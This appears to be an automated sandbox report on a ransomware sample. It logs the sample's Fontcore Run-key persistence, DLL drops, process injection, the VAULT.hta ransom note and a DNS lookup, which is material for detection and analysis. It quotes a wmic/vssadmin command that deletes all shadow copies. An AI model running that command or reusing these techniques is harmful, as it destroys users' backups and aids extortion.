Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Fontcore = "C:\\Windows\\SysWOW64\\Fontcore\\Fontcore.lnk" C:\Windows\SysWOW64\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Fontcore = "C:\\Windows\\SysWOW64\\Fontcore\\Fontcore.lnk" C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\Fontcore\ActionCenterCPL.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-crt-multibyte-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\bcryptprimitives.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\catsrv.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\AuxiliaryDisplayApi.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\Fontcore.cmd C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\ActionCenterCPL.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\activeds.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-crt-conio-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\appmgr.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\appidapi.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\bitsprx6.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\advpack.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-file-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-crt-private-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\apilogen.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-downlevel-version-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-service-management-l2-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\adsldpc.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-heap-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-crt-heap-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-downlevel-ole32-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File opened for modification C:\Windows\SysWOW64\Fontcore C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-processthreads-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\btpanui.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\BWUnpairElevated.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\cabview.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\Fontcore.lnk C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-errorhandling-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-interlocked-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-localization-l1-2-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\avifil32.dll C:\Windows\SysWOW64\explorer.exe N/A
File opened for modification C:\Windows\SysWOW64\Fontcore\Fontcore.lnk C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-rtlsupport-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-synch-l1-2-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\authui.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\bitsprx4.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\catsrvut.dll C:\Windows\SysWOW64\explorer.exe N/A
File opened for modification C:\Windows\SysWOW64\Fontcore\Fontcore.cmd C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-datetime-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-core-namedpipe-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\api-ms-win-downlevel-normaliz-l1-1-0.dll C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\SysWOW64\Fontcore\audiodev.dll C:\Windows\SysWOW64\explorer.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\svchost.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2536 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe
PID 2772 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Windows\SysWOW64\explorer.exe
PID 2772 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Windows\SysWOW64\explorer.exe
PID 2772 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Windows\SysWOW64\explorer.exe
PID 2772 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe C:\Windows\SysWOW64\explorer.exe
PID 2796 wrote to memory of 2760 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\tasklist.exe
PID 2796 wrote to memory of 2760 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\tasklist.exe
PID 2796 wrote to memory of 2760 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\tasklist.exe
PID 2796 wrote to memory of 2760 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\tasklist.exe
PID 2760 wrote to memory of 2576 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 2576 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 2576 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 2576 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 1840 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 1840 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 1840 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 1840 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2576 wrote to memory of 576 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 2576 wrote to memory of 576 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 2576 wrote to memory of 576 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 2576 wrote to memory of 576 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 1840 wrote to memory of 952 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 1840 wrote to memory of 952 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 1840 wrote to memory of 952 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 1840 wrote to memory of 952 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 2760 wrote to memory of 1672 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 1672 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 1672 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 1672 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 576 wrote to memory of 2396 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 576 wrote to memory of 2396 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 576 wrote to memory of 2396 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 576 wrote to memory of 2396 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 576 wrote to memory of 2516 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mshta.exe
PID 576 wrote to memory of 2516 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mshta.exe
PID 576 wrote to memory of 2516 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mshta.exe
PID 576 wrote to memory of 2516 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mshta.exe
PID 2760 wrote to memory of 2876 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 2876 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 2876 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 2876 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2876 wrote to memory of 1748 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 2876 wrote to memory of 1748 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 2876 wrote to memory of 1748 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 2876 wrote to memory of 1748 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\svchost.exe
PID 2760 wrote to memory of 2792 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 2792 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 2792 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 2760 wrote to memory of 2792 N/A C:\Windows\SysWOW64\tasklist.exe C:\Windows\SysWOW64\explorer.exe
PID 1748 wrote to memory of 2884 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mshta.exe
PID 1748 wrote to memory of 2884 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mshta.exe
PID 1748 wrote to memory of 2884 N/A C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\mshta.exe

Uses Volume Shadow Copy service COM API

ransomware

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\SysWOW64\svchost.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe

"C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe"

C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe

C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\tasklist.exe

C:\Windows\SysWOW64\tasklist.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic process call create "vssadmin.exe delete shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\mshta.exe

mshta.exe C:\Users\Admin\Desktop\VAULT.hta

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\mshta.exe

mshta.exe C:\Users\Admin\Desktop\VAULT.hta

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 360

Network

Country Destination Domain Proto
US 8.8.8.8:53 hollandfintech.net udp

Files

memory/2536-0-0x00000000003C0000-0x00000000003C5000-memory.dmp

memory/2772-1-0x0000000000300000-0x0000000000400000-memory.dmp

memory/2772-7-0x0000000000400000-0x00000000009E9000-memory.dmp

memory/2772-17-0x0000000000400000-0x00000000009E9000-memory.dmp

memory/2772-14-0x0000000000400000-0x00000000009E9000-memory.dmp

memory/2772-18-0x0000000000400000-0x000000000040F1F7-memory.dmp

memory/2772-15-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2772-11-0x0000000000400000-0x00000000009E9000-memory.dmp

memory/2772-5-0x0000000000400000-0x00000000009E9000-memory.dmp

memory/2772-13-0x0000000000400000-0x00000000009E9000-memory.dmp

memory/2772-10-0x0000000000400000-0x00000000009E9000-memory.dmp

memory/2772-3-0x0000000000400000-0x00000000009E9000-memory.dmp

memory/2772-19-0x0000000000400000-0x00000000009E9000-memory.dmp

memory/2796-21-0x0000000000CE0000-0x0000000000F61000-memory.dmp

memory/2796-22-0x0000000000CE0000-0x0000000000F61000-memory.dmp

memory/2760-68-0x0000000000610000-0x0000000000626000-memory.dmp

memory/2796-67-0x0000000000CE0000-0x0000000000F61000-memory.dmp

memory/2760-69-0x0000000000610000-0x0000000000626000-memory.dmp

C:\Windows\SysWOW64\Fontcore\Fontcore.cmd

MD5 1105f1e5cd13fc30fde877432e27457d
SHA1 108f03f9c98c63506dd8b9f6581f37ae5c18de23
SHA256 dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d
SHA512 49e9e4b02f432b9cc8f36913ce275f1d13672be627119c183713b5d6fb9fe27fd2cea67421560a463aaa16db35feb15df7c45258e2d102b5f70edb02865d9373

memory/2760-71-0x0000000000610000-0x0000000000626000-memory.dmp

memory/2576-73-0x0000000000CE0000-0x0000000000F61000-memory.dmp

memory/2576-72-0x0000000000CE0000-0x0000000000F61000-memory.dmp

memory/2576-74-0x0000000000CE0000-0x0000000000F61000-memory.dmp

memory/576-79-0x00000000000D0000-0x00000000000FE000-memory.dmp

memory/576-78-0x0000000000F30000-0x0000000000F38000-memory.dmp

memory/1840-82-0x0000000000CE0000-0x0000000000F61000-memory.dmp

